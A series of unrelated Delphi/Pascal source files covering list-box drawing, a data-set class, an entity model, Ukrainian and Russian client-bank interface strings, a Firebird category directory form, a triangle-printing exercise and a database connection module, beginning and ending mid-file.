Rectangle(BoundsRect.Left,BoundsRect.Top,BoundsRect.Left + 11,BoundsRect.Bottom); end; end; // move drawbuffer to the canvas lbItems.Canvas.CopyRect(Rect,fDrawBuffer.Canvas,BoundsRect); // disable focus rectangle If odFocused in State then lbItems.Canvas.DrawFocusRect(Rect); end; end; //------------------------------------------------------------------------------ procedure TfItemSelectForm.btnAcceptClick(Sender: TObject); begin fAccepted := True; Close; end; //------------------------------------------------------------------------------ procedure TfItemSelectForm.btnCancelClick(Sender: TObject); begin fAccepted := False; Close; end; end.
unit SingleDataSet; interface uses AbstractDataSet; type TSingleDataSet = class (TAbstractDataSet) private // Gets function GetData(_pos: integer): single; reintroduce; overload; // Sets procedure SetData(_pos: integer; _data: single); reintroduce; overload; protected FData : packed array of single; // Gets function GetDataLength: integer; override; function GetLast: integer; override; // Sets procedure SetLength(_size: integer); override; public // copies procedure Assign(const _Source: TAbstractDataSet); override; // properties property Data[_pos: integer]:single read GetData write SetData; end; implementation // Gets function TSingleDataSet.GetData(_pos: integer): single; begin Result := FData[_pos]; end; function TSingleDataSet.GetDataLength: integer; begin Result := High(FData) + 1; end; function TSingleDataSet.GetLast: integer; begin Result := High(FData); end; // Sets procedure TSingleDataSet.SetData(_pos: integer; _data: single); begin FData[_pos] := _data; end; procedure TSingleDataSet.SetLength(_size: Integer); begin System.SetLength(FData,_size); end; // copies procedure TSingleDataSet.Assign(const _Source: TAbstractDataSet); var maxData,i: integer; begin Length := _Source.Length; maxData := GetDataLength() - 1; for i := 0 to maxData do begin Data[i] := (_Source as TSingleDataSet).Data[i]; end; end; end.
unit UItensRateioVO; interface uses Atributos, Classes, Constantes, Generics.Collections, SysUtils, UGenericVO, UUnidadeVO; type [TEntity] [TTable('ItensRateio')] TItensRateioVO = class(TGenericVO) private FidItensRateio : Integer; FidRateio : Integer; FidUnidade : Integer; FvlRateio : currency; FvlFundoReserva : currency; FdtRateio : TDateTime; FdsUnidade : String; Fvlareatotal : Currency; public UnidadeVO : TUnidadeVO; [TId('idItensRateio')] [TGeneratedValue(sAuto)] property idItensRateio : Integer read FidItensRateio write FidItensRateio; [TColumn('idRateio','Leitura Gás',0,[ldLookup,ldComboBox], False)] property idRateio: integer read FidRateio write FidRateio; [TColumn('dtRateio','Data',0,[ldGrid,ldLookup,ldComboBox], False)] property dtRateio: TDateTime read FdtRateio write FdtRateio; [TColumn('idUnidade','Unidade',0,[ldLookup,ldComboBox], False)] property idUnidade: integer read FidUnidade write FidUnidade; [TColumn('vlRateio','Valor Medido',50,[ldGrid,ldLookup,ldComboBox], False)] property vlRateio: currency read FvlRateio write FvlRateio; [TColumn('vlFundoReserva','Valor Calculado',50,[ldGrid,ldLookup,ldComboBox], False)] property vlFundoReserva: currency read FvlFundoReserva write FvlFundoReserva; // [TColumn('DSUNIDADE','Unidade',0,[], True, 'Unidade', 'idUnidade', 'idUnidade')] // property DsUnidade: string read FdsUnidade write FdsUnidade; // [TColumn('vlareatotal','Valor Area',0,[], True, 'Unidade', 'idUnidade', 'idUnidade')] // property vlareatotal: Currency read Fvlareatotal write Fvlareatotal; procedure ValidarCamposObrigatorios; end; implementation procedure TItensRateioVO.ValidarCamposObrigatorios; begin if (self.dtRateio = 0) then begin raise Exception.Create('O campo Data é obrigatório!'); end; end; end.
unit ConstClBank; interface resourcestring { ClBank_ACTION_ADD_CONST ='Добавить'; ClBank_ACTION_DELETE_CONST ='Удалить'; ClBank_ACTION_EDIT_CONST ='Редактировать'; ClBank_ACTION_REFRESH_CONST ='Обновить'; ClBank_ACTION_CLOSE_CONST ='Закрыть'; ClBank_ACTION_PRINT_CONST ='Печать'; ClBank_ACTION_HELP_CONST ='Помощь'; ClBank_ACTION_CHOOSE_CONST ='Выбрать'; ClBank_ACTION_FILTER_CONST ='Фильтр'; ClBank_ACTION_SAVE_CONST ='Сохранить'; ClBank_ACTION_MARK_DELETE_CONST ='Пометить на удал.'; ClBank_ACTION_MARK_DELETE_ALL_CONST ='Пометить все на удал.'; ClBank_ACTION_UNMARK_DELETE_CONST ='Отменить удал.'; ClBank_ACTION_UNMARK_DELETE_ALLCONST ='Отменить удал. у всех'; ClBank_ACTION_CLEAR_CONST ='Очистить'; ClBank_ACTION_WOTK_CONST ='Обработать заново';} ClBank_ACTION_ADD_CONST ='Додати'; ClBank_ACTION_DELETE_CONST ='Видалити'; ClBank_ACTION_EDIT_CONST ='Редагувати'; ClBank_ACTION_REFRESH_CONST ='Оновити'; ClBank_ACTION_CLOSE_CONST ='Закрити'; ClBank_ACTION_PRINT_CONST ='Друкувати'; ClBank_ACTION_HELP_CONST ='Допомога'; ClBank_ACTION_CHOOSE_CONST ='Вибрати'; ClBank_ACTION_FILTER_CONST ='Фільтр'; ClBank_ACTION_SAVE_CONST ='Зберегти'; ClBank_ACTION_MARK_DELETE_CONST ='Помітити на вилуч.'; ClBank_ACTION_MARK_DELETE_ALL_CONST ='Помітити все на вилуч..'; ClBank_ACTION_UNMARK_DELETE_CONST ='Відмінити вилучення'; ClBank_ACTION_UNMARK_DELETE_ALLCONST ='Відмінити вилучення у всіх'; ClBank_ACTION_CLEAR_CONST ='Очистити'; ClBank_ACTION_WOTK_CONST ='Обробити знову'; ClBank_ACTION_FIND ='Пошук'; ClBank_ACTION_DELETE_ALL_CONST ='Видалити усі необроблені документи з КБ, які відображені'; ClBank_DOC_NUM = 'Ви дійсно бажаете видалити документ № '; ClBank_MESSAGE_DELETE_ALL_NEOBR = 'Ви дійсно бажаете видалити УСІ необроблені документи, які відображені?'; { ClBank_BUTTON_OK_CONST ='Ок'; ClBank_BUTTON_CANCEL_CONST ='Отмена'; ClBank_BUTTON_YES_CONST ='Да'; ClBank_BUTTON_NO_CONST ='нет';} ClBank_BUTTON_OK_CONST ='Ок'; ClBank_BUTTON_CANCEL_CONST ='Відмінити'; ClBank_BUTTON_YES_CONST ='Да'; ClBank_BUTTON_NO_CONST ='Ні'; { ClBank_MESSAGE_WARNING ='Внимание!'; ClBank_MESSAGE_ERROR ='Ошибка!'; ClBank_MESSAGE_HINT ='Предупреждение!'; ClBank_MESSAGE_DELETE ='Вы действительно хотите удалить?'; ClBank_MESSAGE_NOT_DATA ='Неполные данные'; ClBank_MESSAGE_WAIT ='Ждите. Идет обработка данных.';} ClBank_MESSAGE_WARNING ='Увага!'; ClBank_MESSAGE_ERROR ='Помилка!'; ClBank_MESSAGE_HINT ='Попередження!'; ClBank_MESSAGE_DELETE ='Ви дійсно бажаете видалити?'; ClBank_MESSAGE_NOT_DATA ='Неповні дані'; ClBank_MESSAGE_WAIT ='Чекайте. Йде обробка даних.'; { ClBank_NAME_BANK ='Название файла'; ClBank_CODE_BANK ='Код банка'; ClBank_TYPE_FILE ='Тип файла'; ClBank_LAST_RUN ='Последний запуск'; ClBank_SP ='Процедура обработки'; ClBank_FILE ='Название файла'; ClBank_SP_PARAM ='Параметры процедуры'; ClBank_FILE_FIELDS ='Поля файла'; ClBank_SETUP ='Настройка клиент банка'; ClBank_SPParam ='Параметры процедури';} ClBank_NAME_BANK ='Назва банку'; ClBank_CODE_BANK ='Код банку'; ClBank_TYPE_FILE ='Тип файлу'; ClBank_LAST_RUN ='Останній запуск'; ClBank_SP ='Процедура обробки'; ClBank_FILE ='Назва файлу'; ClBank_SP_PARAM ='Параметри процедури'; ClBank_FILE_FIELDS ='Поля файлу'; ClBank_SETUP ='Настроювання кліент банку'; ClBank_SPParam ='Параметри процедури'; ClBank_USE_MFO ='Використовувати задане МФО'; ClBank_INOUT_SUM ='Використовувати задане значення прибутка\вибутка'; ClBank_MODI_SUM ='Модифікувати суму документу'; ClBank_IgnorFields ='Ігнорувати поле'; { ClBank_CFieldDBF ='Поля файла'; ClBank_CLabelSP ='Процедура'; ClBank_CLabelDBF ='Файл данных'; ClBank_MESSAGE_SAVE_ERROR ='Ошибка при сохраниении данных. Обратитесь к администатору.'; ClBank_MESSAGE_NO_SP ='Не выбрана процудура для экспорта.'; ClBank_MESSAGE_NO_FILE ='Не выбран файл для экспорта.'; ClBank_MESSAGE_NI_FILE_EXIST ='Такой файл не существует.'; ClBank_MESSAGE_NOT_DELETE ='Данный документ не может быть удален.'; ClBank_GET_PARAM ='Забор данных'; ClBank_date_doc ='Дата документа'; ClBank_date_vip ='Дата банковской выписки'; ClBank_number_doc ='Номер документа'; ClBank_summa ='Сума документа';} ClBank_CFieldDBF ='Поля файлу'; ClBank_CLabelSP ='Процедура'; ClBank_CLabelDBF ='Файл даних'; ClBank_MESSAGE_SAVE_ERROR ='Помилка при збереженні данних. Зверніться до адміністратора.'; ClBank_MESSAGE_NO_SP ='Не вибрана процедура для експорту.'; ClBank_MESSAGE_NO_FILE ='Не вибран файл для експорту.'; ClBank_MESSAGE_NI_FILE_EXIST ='Такий файл не існує.'; ClBank_MESSAGE_NOT_DELETE ='Данний документ не може бути вилучен.'; ClBank_GET_PARAM ='Забір данних'; ClBank_date_doc ='Дата документа'; ClBank_date_vip ='Дата банківської виписки'; ClBank_number_doc ='Номер документа'; ClBank_summa ='Сума документа'; { ClBank_note ='Основание документа'; ClBank_rs_native ='Наши реквизиты'; ClBank_rs_customer ='Реквизиты контрагента'; ClBank_customer ='Контрагент'; ClBank_type_doc ='Тип документа'; ClBank_prihod ='Приход'; ClBank_rashod ='Расход'; ClBank_prras ='Приход\Расход'; clBank_mfo ='МФО'; ClBank_rs ='Расчетный счет'; ClBank_From_SPR ='Из справочника'; ClBank_From_text ='По включению';} ClBank_note ='Підстава документа'; ClBank_rs_native ='Наші реквізити'; ClBank_rs_customer ='Реквізити контрагента'; ClBank_customer ='Контрагент'; ClBank_type_doc ='Тип документу'; ClBank_prihod ='Прибуток'; ClBank_rashod ='Видаток'; ClBank_prras ='Прибуток\Видаток'; clBank_mfo ='МФО'; ClBank_rs ='Розрахунковий рахунок'; ClBank_From_SPR ='З довідника'; ClBank_From_text ='За включенням'; { ClBank_Column_Edit ='Редактор колонок'; ClBank_CAPTION_LOG ='Экспорт данных из клиент банка'; ClBank_DOC_ClBank ='Платежный документ'; ClBank_Begin ='С'; ClBank_End ='ПО';} ClBank_Column_Edit ='Редактор колонок'; ClBank_CAPTION_LOG ='Експорт даних з кліент-банка'; ClBank_DOC_ClBank ='Платіжний документ'; ClBank_Begin ='З'; ClBank_End ='До'; ClBank_Check_Doublicate ='Перевірка на повторення даних'; ClBank_Check_Date ='Перевірка на останній запуск'; ClBank_WORK ='Оброблен'; ClBank_UNWORK ='Не оброблен'; ClBank_OKPO = 'Діапазон ЄДРПОУ'; ClBank_date_prov = 'Дата проведення документу'; Clbank_report_ChP = 'Звіт за приватними підприємцями'; Clbank_date_doc_vip = 'Дата документу не може бути більш за дату виписки!'; implementation end.
unit St_sp_Type_Category_Form; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, cxStyles, cxCustomData, cxGraphics, cxFilter, cxData, cxDataStorage, cxEdit, DB, cxDBData, cxCheckBox, FIBQuery, pFIBQuery, pFIBStoredProc, ActnList, FIBDataSet, pFIBDataSet, cxContainer, cxLabel, ExtCtrls, cxGridLevel, cxGridCustomTableView, cxGridTableView, cxGridDBTableView, cxClasses, cxControls, cxGridCustomView, cxGrid, ImgList, ComCtrls, ToolWin, cxGridCustomPopupMenu, cxGridPopupMenu, Menus, StdCtrls, FIBDatabase, pFIBDatabase,IBase, St_Proc, dxStatusBar, st_ConstUnit; type TTypeCategoryForm = class(TForm) cxGrid1: TcxGrid; cxGrid1DBTableView1: TcxGridDBTableView; cxGrid1DBTableView1DBColumn1: TcxGridDBColumn; cxGrid1DBTableView1ID_TYPE_CATEGORY: TcxGridDBColumn; cxGrid1DBTableView1NAME_TYPE_CATEGORY: TcxGridDBColumn; cxGrid1DBTableView1NAME_SHORT: TcxGridDBColumn; cxGrid1DBTableView1MONTH_OPL: TcxGridDBColumn; cxGrid1Level1: TcxGridLevel; Panel1: TPanel; cxLabel1: TcxLabel; MonthOplCheck: TcxCheckBox; cxStyleRepository1: TcxStyleRepository; cxStyle1: TcxStyle; cxStyle2: TcxStyle; DataSet: TpFIBDataSet; DataSource: TDataSource; ActionList1: TActionList; AddAction: TAction; EditAction: TAction; DeleteAction: TAction; RefreshAction: TAction; ExitAction: TAction; WriteProc: TpFIBStoredProc; ReadDataSet: TpFIBDataSet; ToolBar1: TToolBar; AddButton: TToolButton; EditButton: TToolButton; DeleteButton: TToolButton; RefreshButton: TToolButton; ExitButton: TToolButton; ImageListOfCategory: TImageList; SelectButton: TToolButton; cxStyle3: TcxStyle; cxStyle4: TcxStyle; PopupMenu1: TPopupMenu; N1: TMenuItem; N2: TMenuItem; DeleteAction1: TMenuItem; RefreshAction1: TMenuItem; ShortNameLabel: TEdit; SearchButton_Naim: TToolButton; N3: TMenuItem; DB: TpFIBDatabase; ReadTransaction: TpFIBTransaction; WriteTransaction: TpFIBTransaction; PopupImageList: TImageList; HotKey_StatusBar: TdxStatusBar; SelectAction: TAction; procedure SelectButtonClick(Sender: TObject); procedure cxGrid1DBTableView1DblClick(Sender: TObject); procedure DataSetAfterScroll(DataSet: TDataSet); procedure ExitButtonClick(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure DataSetAfterOpen(DataSet: TDataSet); procedure FormCreate(Sender: TObject); procedure AddButtonClick(Sender: TObject); procedure EditButtonClick(Sender: TObject); procedure DeleteButtonClick(Sender: TObject); procedure RefreshButtonClick(Sender: TObject); procedure FormShow(Sender: TObject); procedure SearchButton_NaimClick(Sender: TObject); private PLanguageIndex: byte; procedure FormIniLanguage(); public KeyField : string; constructor Create (AOwner: TComponent; DB_Handle:TISC_DB_HANDLE;IsChild: boolean; AllowMultiSelect: boolean);reintroduce; procedure SelectAll; end; function View_st_Type_Category(AOwner : TComponent;DB:TISC_DB_HANDLE; ShowModal: boolean; MultiSelect: boolean; ID : int64):variant;stdcall; exports View_st_Type_Category; var TypeCategoryForm: TTypeCategoryForm; res:Variant; implementation uses St_sp_Category_Type_Add, Search_LgotUnit_TC, Search_Unit_TC; {$R *.dfm} procedure TTypeCategoryForm.FormIniLanguage(); begin // индекс языка (1-укр, 2 - рус) PLanguageIndex:= St_Proc.cnLanguageIndex; Caption := st_ConstUnit.st_CatTypeSprav[PLanguageIndex]; //названия кнопок ExitButton.Caption := st_ConstUnit.st_ExitBtn_Caption[PLanguageIndex]; ExitButton.Hint := st_ConstUnit.st_ExitBtn_Caption[PLanguageIndex]; AddButton.Caption := st_ConstUnit.st_InsertBtn_Caption[PLanguageIndex]; AddButton.Hint := st_ConstUnit.st_InsertBtn_Caption[PLanguageIndex]; EditButton.Caption := st_ConstUnit.st_EditBtn_Caption[PLanguageIndex]; EditButton.Hint := st_ConstUnit.st_EditBtn_Caption[PLanguageIndex]; DeleteButton.Caption := st_ConstUnit.st_DeleteBtn_Caption[PLanguageIndex]; DeleteButton.Hint := st_ConstUnit.st_DeleteBtn_Caption[PLanguageIndex]; RefreshButton.Caption := st_ConstUnit.st_RefreshBtn_Caption[PLanguageIndex]; RefreshButton.Hint := st_ConstUnit.st_RefreshBtn_Caption[PLanguageIndex]; SelectButton.Caption := st_ConstUnit.st_Select_Caption[PLanguageIndex]; SelectButton.Hint := st_ConstUnit.st_Select_Caption[PLanguageIndex]; SearchButton_Naim.Caption := st_ConstUnit.st_ZaName[PLanguageIndex]; SearchButton_Naim.Hint := st_ConstUnit.st_ZaName[PLanguageIndex]; HotKey_StatusBar.Panels[0].Text:= st_ConstUnit.st_InsertBtn_ShortCut[PLanguageIndex] + st_ConstUnit.st_InsertBtn_Caption[PLanguageIndex]; HotKey_StatusBar.Panels[1].Text:= st_ConstUnit.st_EditBtn_ShortCut[PLanguageIndex] + st_ConstUnit.st_EditBtn_Caption[PLanguageIndex]; HotKey_StatusBar.Panels[2].Text:= st_ConstUnit.st_DeleteBtn_ShortCut[PLanguageIndex] + st_ConstUnit.st_DeleteBtn_Caption[PLanguageIndex]; HotKey_StatusBar.Panels[3].Text:= st_ConstUnit.st_RefreshBtn_ShortCut[PLanguageIndex] + st_ConstUnit.st_RefreshBtn_Caption[PLanguageIndex]; HotKey_StatusBar.Panels[4].Text:= st_ConstUnit.st_Select_Caption[PLanguageIndex] + st_ConstUnit.st_EnterBtn_ShortCut[PLanguageIndex]; HotKey_StatusBar.Panels[5].Text:= st_ConstUnit.st_ExitBtn_ShortCut[PLanguageIndex] + st_ConstUnit.st_ExitBtn_Caption[PLanguageIndex]; HotKey_StatusBar.Hint := st_ConstUnit.st_HotKeys[PLanguageIndex]; cxLabel1.Caption := st_ConstUnit.st_ShortLable[PLanguageIndex]; MonthOplCheck.Properties.Caption := st_ConstUnit.st_ByMonth[PLanguageIndex]; // пошел грид cxGrid1DBTableView1NAME_TYPE_CATEGORY.Caption := st_ConstUnit.st_NameLable[PLanguageIndex]; N1.Caption := st_ConstUnit.st_InsertBtn_Caption[PLanguageIndex]; N2.Caption := st_ConstUnit.st_EditBtn_Caption[PLanguageIndex]; DeleteAction1.Caption := st_ConstUnit.st_DeleteBtn_Caption[PLanguageIndex]; RefreshAction1.Caption := st_ConstUnit.st_RefreshBtn_Caption[PLanguageIndex]; N3.Caption := st_ConstUnit.st_KontextPoisk[PLanguageIndex]; N1.Hint := st_ConstUnit.st_InsertBtn_Caption[PLanguageIndex]; N2.Hint := st_ConstUnit.st_EditBtn_Caption[PLanguageIndex]; DeleteAction1.Hint := st_ConstUnit.st_DeleteBtn_Caption[PLanguageIndex]; RefreshAction1.Hint := st_ConstUnit.st_RefreshBtn_Caption[PLanguageIndex]; N3.Caption := st_ConstUnit.st_KontextPoisk[PLanguageIndex]; end; constructor TTypeCategoryForm.Create(AOwner: TComponent; DB_Handle:TISC_DB_HANDLE; IsChild: boolean; AllowMultiSelect: boolean); begin inherited Create(AOwner); Screen.Cursor:= crHourGlass; DB.Handle:=DB_Handle; if IsChild then begin Formstyle:=fsMDIChild; SelectButton.Enabled:=false; end else begin if AllowMultiSelect then begin Formstyle:=fsNormal; cxGrid1DBTableView1.Columns[0].Visible := true; SelectButton.Enabled:=true; cxGrid1DBTableView1.OptionsSelection.MultiSelect:=true; SearchButton_Naim.Enabled:=true; end else begin Formstyle:=fsNormal; SelectButton.Enabled:=true; SearchButton_Naim.Enabled:=true; cxGrid1DBTableView1.OptionsSelection.MultiSelect:=false; end; end; Screen.Cursor:= crDefault; end; function View_st_Type_Category(AOwner : TComponent;DB:TISC_DB_HANDLE; ShowModal: boolean; MultiSelect: boolean; ID : int64):variant;stdcall; var ViewForm:TTypeCategoryForm; begin if not IsMDIChildFormShow(TTypeCategoryForm) then if ShowModal=false then begin ViewForm:=TTypeCategoryForm.Create(AOwner,DB, true, false); ViewForm.selectall; View_st_Type_Category:=res; end else begin if (not MultiSelect) then begin ViewForm:=TTypeCategoryForm.Create(AOwner,DB, false, false); ViewForm.selectall; if (ID <> -2) then ViewForm.DataSet.Locate('ID_TYPE_CATEGORY', ID, []); ViewForm.ShowModal; View_st_Type_Category:=res; end else begin ViewForm:=TTypeCategoryForm.Create(AOwner,DB, false, true); ViewForm.selectall; ViewForm.ShowModal; View_st_Type_Category:=res; end; end; end; function BoolConvert(const b : boolean) : shortint; begin if b then Result := 1 else Result := 0; end; procedure TTypeCategoryForm.SelectAll; begin DataSet.Close; DataSet.Open; end; procedure TTypeCategoryForm.SelectButtonClick(Sender: TObject); var i : integer; RecMultiSelected : integer; begin if cxGrid1DBTableView1.OptionsSelection.MultiSelect=true then begin RecMultiSelected:=cxGrid1DBTableView1.DataController.GetSelectedCount; res:=VarArrayCreate([0,RecMultiSelected-1],varVariant); for i:=0 to cxGrid1DBTableView1.DataController.GetSelectedCount-1 do begin res[i]:=cxGrid1DBTableView1.Controller.SelectedRecords[i].Values[1]; end; end; if cxGrid1DBTableView1.OptionsSelection.MultiSelect=false then begin res:=VarArrayCreate([0,2],varVariant); res[0]:=DataSet['ID_TYPE_CATEGORY']; res[1]:=DataSet['NAME_TYPE_CATEGORY']; res[2]:=DataSet['MONTH_OPL']; end; ModalResult := mrOK; end; procedure TTypeCategoryForm.cxGrid1DBTableView1DblClick(Sender: TObject); var i : integer; RecMultiSelected : integer; begin if cxGrid1DBTableView1.OptionsSelection.MultiSelect=true then begin RecMultiSelected:=cxGrid1DBTableView1.DataController.GetSelectedCount; res:=VarArrayCreate([0,RecMultiSelected-1],varVariant); for i:=0 to cxGrid1DBTableView1.DataController.GetSelectedCount-1 do begin res[i]:=cxGrid1DBTableView1.Controller.SelectedRecords[i].Values[1]; end; end; if cxGrid1DBTableView1.OptionsSelection.MultiSelect=false then begin res:=VarArrayCreate([0,2],varVariant); res[0]:=DataSet['ID_TYPE_CATEGORY']; res[1]:=DataSet['NAME_TYPE_CATEGORY']; res[2]:=DataSet['MONTH_OPL']; end; if FormStyle = fsMDIChild then EditButtonClick(Sender); ModalResult := mrOK; end; procedure TTypeCategoryForm.DataSetAfterScroll(DataSet: TDataSet); begin if DataSet.RecordCount = 0 then exit; if DataSet['NAME_SHORT']<> null then ShortNameLabel.Text := DataSet['NAME_SHORT']; if DataSet['MONTH_OPL']<> null then MonthOplCheck.Checked := DataSet['MONTH_OPL'] = 1; end; procedure TTypeCategoryForm.ExitButtonClick(Sender: TObject); begin res:=null; close; end; procedure TTypeCategoryForm.FormClose(Sender: TObject; var Action: TCloseAction); begin Action:=caFree; end; procedure TTypeCategoryForm.DataSetAfterOpen(DataSet: TDataSet); begin if DataSet.RecordCount = 0 then begin EditButton.Enabled := false; DeleteButton.Enabled := false; // SelectButton.Enabled := false; end else begin EditButton.Enabled := true; DeleteButton.Enabled := true; // SelectButton.Enabled := true; end; end; procedure TTypeCategoryForm.FormCreate(Sender: TObject); begin KeyField := 'ID_TYPE_CATEGORY'; end; procedure TTypeCategoryForm.AddButtonClick(Sender: TObject); var new_id : integer; begin TypeCategoryFormAdd := TTypeCategoryFormAdd.Create(Self); TypeCategoryFormAdd.Caption := st_ConstUnit.st_InsertBtn_Caption[PLanguageIndex]; TypeCategoryFormAdd.PLanguageIndex := PLanguageIndex; if TypeCategoryFormAdd.ShowModal = mrOK then begin WriteProc.StoredProcName := 'ST_INI_TYPE_CATEGORY_INSERT'; WriteProc.Transaction.StartTransaction; WriteProc.Prepare; WriteProc.ParamByName('NAME_TYPE_CATEGORY').AsString := TypeCategoryFormAdd.NameEdit.Text; WriteProc.ParamByName('NAME_SHORT').AsString := TypeCategoryFormAdd.ShortEdit.Text; WriteProc.ParamByName('MONTH_OPL').AsInteger := BoolConvert(TypeCategoryFormAdd.MonthOplCheck.Checked); WriteProc.ExecProc; new_id := WriteProc[KeyField].AsInteger; try WriteProc.Transaction.Commit; WriteProc.Close; except WriteProc.Transaction.Rollback; WriteProc.Close; raise; end; SelectAll; DataSet.Locate(KeyField, new_id, []); end; TypeCategoryFormAdd.Free; end; procedure TTypeCategoryForm.EditButtonClick(Sender: TObject); var id : integer; begin id := DataSet[KeyField]; TypeCategoryFormAdd := TTypeCategoryFormAdd.Create(Self); TypeCategoryFormAdd.Caption := st_ConstUnit.st_EditBtn_Caption[PLanguageIndex]; TypeCategoryFormAdd.PLanguageIndex := PLanguageIndex; if DataSet['NAME_SHORT']<> null then TypeCategoryFormAdd.ShortEdit.Text := DataSet['NAME_SHORT']; if DataSet['NAME_TYPE_CATEGORY']<> null then TypeCategoryFormAdd.NameEdit.Text := DataSet['NAME_TYPE_CATEGORY']; if DataSet['MONTH_OPL']<> null then TypeCategoryFormAdd.MonthOplCheck.Checked := DataSet['MONTH_OPL'] = 1; if TypeCategoryFormAdd.ShowModal = mrOK then begin WriteProc.StoredProcName := 'ST_INI_TYPE_CATEGORY_UPDATE'; WriteProc.Transaction.StartTransaction; WriteProc.Prepare; WriteProc.ParamByName(KeyField).AsInteger := id; WriteProc.ParamByName('NAME_TYPE_CATEGORY').AsString := TypeCategoryFormAdd.NameEdit.Text; WriteProc.ParamByName('NAME_SHORT').AsString := TypeCategoryFormAdd.ShortEdit.Text; WriteProc.ParamByName('MONTH_OPL').AsInteger := BoolConvert(TypeCategoryFormAdd.MonthOplCheck.Checked); WriteProc.ExecProc; try WriteProc.Transaction.Commit; WriteProc.Close; except WriteProc.Transaction.Rollback; WriteProc.Close; raise; end; SelectAll; DataSet.Locate(KeyField, id, []); end; TypeCategoryFormAdd.Free; end; procedure TTypeCategoryForm.DeleteButtonClick(Sender: TObject); var selected : integer; begin screen.Cursor:=crHourGlass; ReadDataSet.SelectSQL.Clear; ReadDataSet.SelectSQL.Text := 'select CAN from ST_INI_TYPE_CAT_CAN_DEL(' + IntToStr(DataSet[KeyField]) + ')'; ReadDataSet.Open; if ReadDataSet['CAN'] = 0 then begin screen.Cursor:=crDefault; ShowMessage(PChar(st_ConstUnit.st_mess_NoItemDelete[PLanguageIndex])); ReadDataSet.Close; exit; end; ReadDataSet.Close; screen.Cursor:=crDefault; if MessageBox(Handle,PChar(st_ConstUnit.st_DeletePromt[PLanguageIndex]),PChar(st_ConstUnit.st_Confirmation_Caption[PLanguageIndex]),MB_YESNO or MB_ICONQUESTION)= mrNo then exit; WriteProc.StoredProcName := 'ST_INI_TYPE_CATEGORY_DELETE'; WriteProc.Transaction.StartTransaction; WriteProc.Prepare; WriteProc.ParamByName(KeyField).AsInteger := DataSet[KeyField]; WriteProc.ExecProc; try WriteProc.Transaction.Commit; WriteProc.Close; except WriteProc.Transaction.Rollback; WriteProc.Close; raise; end; selected := cxGrid1DBTableView1.DataController.FocusedRowIndex-1; SelectAll; cxGrid1DBTableView1.DataController.FocusedRowIndex := selected; end; procedure TTypeCategoryForm.RefreshButtonClick(Sender: TObject); var selected : integer; begin Screen.Cursor:=crHourGlass; selected := -1; if DataSet.RecordCount <> 0 then selected := DataSet[KeyField]; SelectAll; DataSet.Locate(KeyField, selected, []); Screen.Cursor:=crDefault; end; procedure TTypeCategoryForm.FormShow(Sender: TObject); begin FormIniLanguage(); if not DataSet.Active then SelectAll; end; procedure TTypeCategoryForm.SearchButton_NaimClick(Sender: TObject); begin if PopupMenu1.Items[4].Checked= true then begin Search_LgotForm := TSearch_LgotForm.Create(Self); Search_LgotForm.PLanguageIndex := PLanguageIndex; while Search_LgotForm.FindFlag = false do begin if Search_LgotForm.FindClosed = true then begin Search_LgotForm.Free; exit; end; if Search_LgotForm.ShowModal = mrOk then begin if Search_LgotForm.FindFlag = true then begin cxGrid1DBTableView1NAME_TYPE_CATEGORY.SortOrder:=soAscending; DataSet.Locate('NAME_TYPE_CATEGORY', Search_LgotForm.Naim_Edit.Text, [loCaseInsensitive, loPartialKey]); Search_LgotForm.Free; exit; end else begin cxGrid1DBTableView1NAME_TYPE_CATEGORY.SortOrder:=soAscending; DataSet.Locate('NAME_TYPE_CATEGORY', Search_LgotForm.Naim_Edit.Text, [loCaseInsensitive, loPartialKey]); Search_LgotForm.showModal; end; end; end; if Search_LgotForm.FindFlag = true then begin cxGrid1DBTableView1NAME_TYPE_CATEGORY.SortOrder:=soAscending; DataSet.Locate('NAME_TYPE_CATEGORY', Search_LgotForm.Naim_Edit.Text, [loCaseInsensitive, loPartialKey]); Search_LgotForm.Free; end; end else begin Search_Form:= TSearch_Form.create(self); Search_Form.PLanguageIndex := PLanguageIndex; if Search_Form.ShowModal = mrOk then begin cxGrid1DBTableView1NAME_TYPE_CATEGORY.SortOrder:=soAscending; DataSet.Locate('NAME_TYPE_CATEGORY', Search_Form.Naim_Edit.Text, [loCaseInsensitive, loPartialKey]); end; end; end; end.
program prog_8_1_Triangles; uses crt; var Height : Integer; Indent : string; Line : string; Line2 : string; NextLine : string; i : Integer; j : Integer; k : Integer; a : Integer; begin writeln('Enter the height of triangle'); readln(Height); Indent := ' '; Line := '^'; Line2 := 'v'; NextLine := Line + Line; a := 1; for i := Height downto 1 do begin for j := i downto 1 do begin write(Indent); end; write(Line); writeln(); Line := Line + NextLine; delay(500); end; Line := '^'; for i := Height downto 1 do begin write(Line); writeln(); Line := Line + NextLine; delay(500); end; Line := '^'; for i := Height downto 1 do begin for j := i * 2 - 1 downto 1 do begin write(Indent); end; write(Line); writeln(); Line := Line + NextLine; delay(500); end; for i := 1 to Height do begin for j := 1 to i do begin write(Indent); end; for k := Height * 2 - 1 downto a do begin write(Line2); end; writeln(); a := a + 2; delay(500); end; a := 1; for i := 1 to Height do begin for j := 1 to a do begin write(Indent); end; for k := Height * 2 - 1 downto a do begin write(Line2); end; writeln(); a := a + 2; delay(500); end; a := 1; for i := 1 to Height do begin for k := Height * 2 - 1 downto a do begin write(Line2); end; writeln(); a := a + 2; delay(500); end; readln(); end.
unit Datenmodul.DM; interface uses System.SysUtils, System.Classes, Data.DB, IBX.IBDatabase, dblogdlg; type TOnErrorMsg=procedure(Sender: TObject; aMsg: string) of object; RConnectType = record Servername: string; Datenbank: string; User: string; Passwort: string; end; type Tdm = class(TDataModule) db: TIBDatabase; procedure DataModuleCreate(Sender: TObject); procedure DataModuleDestroy(Sender: TObject); procedure dbAfterConnect(Sender: TObject); private fOnConnectionError: TOnErrorMsg; fOnAfterConnect: TNotifyEvent; public procedure CheckConnect(aConnectType: RConnectType); property OnConnectionError: TOnErrorMsg read fOnConnectionError write fOnConnectionError; property OnAfterConnect: TNotifyEvent read fOnAfterConnect write fOnAfterConnect; end; var dm: Tdm; implementation {%CLASSGROUP 'Vcl.Controls.TControl'} {$R *.dfm} uses Objekt.Allgemein; procedure Tdm.DataModuleCreate(Sender: TObject); begin // AllgemeinObj.Log.DebugInfo('DataModuleCreate'); end; procedure Tdm.DataModuleDestroy(Sender: TObject); begin // end; procedure Tdm.CheckConnect(aConnectType: RConnectType); var s: string; begin AllgemeinObj.Log.DebugInfo('Start - CheckConnect - ' + aConnectType.Datenbank); if db.Connected then 